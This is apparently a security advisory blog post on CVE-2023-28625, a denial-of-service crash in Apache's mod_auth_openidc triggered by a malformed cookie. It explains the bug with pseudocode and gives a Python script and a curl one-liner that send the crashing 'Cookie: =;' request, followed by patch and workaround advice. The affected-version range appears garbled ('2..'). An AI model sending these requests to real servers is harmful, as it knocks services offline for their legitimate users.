CVE-2023-28625 - Denial-of-Service Vulnerability in mod_auth_openidc – Understanding, Exploitation, and Patch

If your Apache web server uses OpenID Connect with the mod_auth_openidc plugin, it's crucial to be aware of CVE-2023-28625. This vulnerability, discovered in mod_auth_openidc versions 2.. through 2.4.13.1, allows attackers to crash the server using a specially crafted HTTP cookie. As a result, any website relying on this configuration is open to Denial-of-Service (DoS) attacks that disrupt availability.

Let’s break down what happened, how exploitation works, and how to protect your servers.

What is mod_auth_openidc?

mod_auth_openidc is a popular authentication and authorization plugin for Apache HTTP Server (2.x). It lets your apps offload identity management to outside providers (like Google or an enterprise SSO), handling logins and identity with the OpenID Connect protocol. It’s widely used due to its flexibility and security features.

The Vulnerability: Cookie Stripping Gone Wrong

The trouble lies with the OIDCStripCookies setting. This feature is intended to remove certain cookies from incoming requests — for privacy, security, or compatibility reasons. But, between versions 2.. and 2.4.13.1, if a carefully-crafted cookie is sent to the server, mod_auth_openidc can hit a NULL pointer dereference (a fancy way of saying the software tried to use a blank spot in memory). The end result: the Apache worker process crashes instantly.

Official CVE entry: https://nvd.nist.gov/vuln/detail/CVE-2023-28625

Technical Deep Dive

The vulnerable code is in the part of mod_auth_openidc that parses and strips cookies. If the cookie value is malformed (e.g., missing key parts or with an unexpected format), the code can fail to check for a NULL result from a string split or search. When it blindly accesses this pointer, you get a segmentation fault.

Here’s a simplified pseudocode snippet illustrating the risk

char *cookie = get_next_cookie();
// Split cookie on "="
char *name = strtok(cookie, "=");
char *value = strtok(NULL, "=");   // <--- May be NULL if malformed!

if (should_strip(name)) {
    // Unprotected dereference
    strcpy(dest, value);           // <--- Crashes if value == NULL
}

If an attacker sends a malformed cookie like Cookie: =;, value becomes NULL. The next use of value crashes the process.

Attack Scenario

- The attacker sends an HTTP request with a malformed cookie (for example, Cookie: =; or Cookie: , ,).
- The request hits your Apache endpoint with mod_auth_openidc configured _and_ the OIDCStripCookies setting enabled.

The Apache worker handling this request segfaults and dies.

By automating requests, attackers can repeatedly crash workers, denying access to legitimate users and potentially bringing down the whole site.

Here's a simple Python script to send the malicious request

import requests

url = "https://your-vulnerable-site.com/";
headers = {
    "Cookie": "=;"
}
r = requests.get(url, headers=headers)
print(f"Response: {r.status_code}")

Or, you can use curl from your terminal

curl -H "Cookie: =;" https://your-vulnerable-site.com/

After sending this, watch Apache’s error logs — you'll likely see a "segmentation fault" message and notice worker crashes.

The flaw is fully patched in mod_auth_openidc 2.4.13.2. Update the module as soon as possible

- mod_auth_openidc Releases

2. Workaround: Disable OIDCStripCookies

If you absolutely can’t upgrade yet, remove or comment out the OIDCStripCookies directive from your Apache configuration files. This mitigates the vulnerability because the faulty code path is never exercised.

# OIDCStripCookies auth_token sessionid

(Make sure to reload/restart Apache after changes.)

References and Further Reading

- CVE-2023-28625 - NVD Entry
- mod_auth_openidc Security Advisory
- mod_auth_openidc Releases
- OpenID Connect Protocol

Conclusion

CVE-2023-28625 is a classic "low effort, high impact" bug: just a single HTTP request can take out your web server if you're running an affected version and OIDCStripCookies. Don’t leave your systems exposed — upgrade to 2.4.13.2 or later, and review your Apache settings for leftover risky directives. Stay ahead of attackers and protect your availability!

If you run Apache and mod_auth_openidc, make this patch part of your next maintenance window so you don’t get blindsided by a simple cookie!


*Questions or need further guidance? Share in the comments or reach out for more defensive tips!*

Timeline

Published on: 04/03/2023 14:15:00 UTC
Last modified on: 04/30/2023 23:15:00 UTC